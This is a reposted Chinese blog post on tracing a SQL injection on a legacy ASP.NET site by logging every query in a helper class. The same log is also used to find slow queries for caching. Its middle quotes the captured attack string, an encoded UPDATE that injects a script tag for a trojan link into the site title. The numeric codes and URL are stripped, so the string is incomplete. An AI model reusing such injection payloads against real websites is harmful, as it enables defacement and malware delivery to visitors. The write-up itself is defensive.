位置: 编程技术 - 正文

记一次成功的sql注入入侵检测附带sql性能优化(记一次成功的喜悦作文)

编辑:rootadmin
但是如果是让你接手一个二等残废的网站,并让你在上面改版,而且不能推翻式改版,只能逐步替换旧的程序,那么你会非常痛苦,例如我遇到的问题: 问题1. 老板对你说,以前刚做完网站好好了,没有出现木马,怎么你来了,就会出现木马,先别说了,赶紧解决问题,我彻底无语,但是如果争吵,其实证明你和老板一样无知,拿出证据和事实分析来让公司其他稍微懂技术的一起来证明,公司网站被挂马不是你来了的错。 如是我通过网站目录仔细排查将通过fck上传的网马删除并修补fck的上传漏洞并记下了这篇 Fckeditor使用笔记 ,其实很多人都遇到过,也解决过,都是小问题,但是让你老板明白比解决漏洞问题更蛋疼,我那解释的叫一个汗啊,恨不得把公司所有稍微懂点技术的都叫上让他们看什么是大马什么是小马,然后演示怎么上传木马,奶奶的,黑客教程普及啊。 问题2. 网站又出现问题,上次的问题解决了不过两个月,网站又被入侵挂马,如是老板这次再说因为我来了才出问题,立马走人,这就是为什么不能更不懂技术的人硬碰硬,更不能和你的老板来说,说了你又不懂。 但是要命的是网站是以前的技术开发的二等残废,在别个的cms上修改的,我必须保证网站在的开发的同时旧的模块还可以使用,通过逐步更新的方法将网站底层翻新,但是那么多页面,你很难一个一个去检测那个页面有漏洞,如是写出下面的检测代码,没想到这么简单的就搞定了,并且可以通过此方法优化你的sql。 第一步建立一个sql日志表 记录sql语句、此sql语句被执行次数,参数及值,记录开始时间,结束时间,来自哪个页面,ip和此条语句执行时间(暂时没用) 第二步在sqlhelper里写记录代码 两个方法本来可以写成private的,但是此二等残废的网站其他地方用的别的sqlhelper类,就直接调用此处通过合理优化的sqlhelper类的方法了。 代码1:插入日志 代码2:判断此条sql是否存在 第三部在你的每个执行sql语句的方法里加入以下代码,不管是ExecuteScalar、ExecuteReader还是ExecuteNonQuery等等都加上 代码示例:

然后你会发现入侵的入口被记录下来了,后面方框里的就是构造注入的sql

构造sql如下: +update+my_websetting+set+websitetitle=REPLACE(cast(websitetitle+as+varchar()),cast(char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+char()+as+varchar()),cast(char()+as+varchar(8)))-- 转码后变成这样了:   update my_websetting set websitetitle=REPLACE(cast(websitetitle as varchar()),websitetitle+'</title><script src= 这个就是木马地址,没事你就别点了,好奇害死猫。 小结: 既然知道入口就知道怎么补救了吧,把string类型该过滤的都过滤掉,int类型的就得是int类型,别让数据库替你隐式转。通过此sql日志记录,你应该发现一点那个hit还是有点价值的。 通过select top * from my_sqllog order by hit desc 你会发现你写的那么多sql原来真垃圾,在条件允许的情况下干嘛不把它放到缓存里。所以后来我写的sql基本不在这top 里。 抛砖引玉,望高手批评,以上入侵方法希望刚学习做程序员的同学不要用来欺负小网站,伤不起。 作者:jqbird

推荐整理分享记一次成功的sql注入入侵检测附带sql性能优化(记一次成功的喜悦作文),希望有所帮助,仅作参考,欢迎阅读内容。

记一次成功的sql注入入侵检测附带sql性能优化(记一次成功的喜悦作文)

文章相关热门搜索词:记一次成功的尝试作文600字,记一次成功的经历作文400字,记一次成功的经历和感受,记一次成功的尝试作文450字,记一次成功的尝试作文600字,记一次成功的相亲 馒头,记一次成功的尝试作文450字,记一次成功的尝试作文450字,内容如对您有帮助,希望把文章链接给更多的朋友!

sqlserver中在指定数据库的所有表的所有列中搜索给定的值 比如:我们导入了某个客户的资料,我们知道此客户的姓名是ZhangShan,我们想知道,在我们的业务数据库(eg:NorthWind)中,有哪些数据表的哪些字段设置了

mssql server 数据库附加不上解决办法分享 错误,从网上找了一些解决方案,一般都是说文件的权限不足的问题,当然附加的时候必须是有数据库附加权限才可以操作的。解决办法1:给相应

在数据库‘master’中拒绝CREATE DATABASE权限问题的解决方法 publicpartialclassCMS_DBDataContext{partialvoidOnCreated(){//如果数据库不存在则创建数据库if(!this.DatabaseExists()){this.CreateDatabase();}}}遇到了以下错误:在数据库‘master

标签: 记一次成功的喜悦作文

本文链接地址:https://www.jiuchutong.com/biancheng/348852.html 转载请保留说明!

上一篇:根据表名和索引获取需要的列名的存储过程(根据索引名称查字段)

下一篇:sqlserver中在指定数据库的所有表的所有列中搜索给定的值(在sql server)

  • 增值税可以在企业所得税时扣除吗
  • 计提附加税税会计分录
  • 租房代收水电费税率
  • 一般纳税人增值税优惠政策2023
  • 金融企业哪些方面可以进行数据分析
  • 科研材料怎么买
  • 小规模首次申请发票张数
  • 小规模纳税人所得税费用怎么算
  • 软件即征即退的发票怎么开
  • 计划成本法会计分录例题
  • 季节性停用的设备应计提折旧吗
  • 外购已税什么意思
  • 生产事故造成怎么样赔付
  • 私人转公账可以吗
  • 工厂出租厂房税率
  • 公司租车税务处理办法
  • 税控盘费用抵减增值税
  • 个人开劳务专票给公司怎么开
  • 其他应付款的会计英文
  • 环保税与排污费的关系
  • 利润分配表会计分录
  • 每月固定电话费是半固定成本吗
  • 营运资金管理策略有哪些
  • 补缴税款会计分录
  • 高新企业收到政府补贴
  • mac如何打电话
  • 银承到期扣款会计分录
  • 出售固定资产申报表收入与损益表收入不一致
  • antd-vue-pro
  • laravel视频教程
  • 企业所得税税前扣除和不扣除的区别
  • 汇算清缴怎么调减
  • vuecli非根目录打包
  • 如何成功安装暗区突围
  • 蓝桥杯b组2020
  • 【第二趴】uni-app开发工具(手把手带你安装HBuilderX、搭建第一个多端项目初体验)
  • mysqldump 导出数据
  • 银行代发工资会扣个人所得税吗
  • 盈余公积转增会计分录
  • 酒的增值税专票可抵扣不
  • php采集器
  • 实收资本何时入账
  • 酒店打印要钱吗
  • 合同负债算负债吗
  • 工业企业辅助生产设备
  • 权责发生制和收付实现制例题
  • sql查看日志
  • 利息收入为负数的原因
  • 成本票可以用在下个季度吗
  • 固定资产清理的审计目标不包括
  • 定期定额征收和查账征收的区别
  • 库存现金的账务处理流程
  • 生育津贴申请流程
  • win7系统宽带连接651
  • chrome浏览器81.0
  • 微软开放式许可协议
  • 如何重装系统win7具体步骤
  • 忘记mysql密码
  • macbookpro如何点击
  • linux中遇到的问题
  • Linux中cp和scp命令的使用方法
  • win7系统玩游戏卡顿怎么办
  • win8怎么隐藏桌面图标
  • ubuntu搭建android开发环境
  • css border-bottom
  • ecmascript6教程
  • Android 为LinearLayout增加分割线 divider
  • 基于javascript的毕业设计
  • 批处理 读文件
  • 编写高质量代码改善JAVA程序的151个建议
  • webgl fbo
  • javascript中window对象的子对象不包含
  • 广东省深圳市税占27%,高新技术占15%,各市分别占多少?
  • 服务协议属于哪类合同
  • 车辆保险增值税税率是多少
  • 如何连续打印单据
  • 企业如何网上申报税
  • 税务绩效管理4+4+4+n
  • 两利四率完成情况
  • 十四五时期的税制改革重点是
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设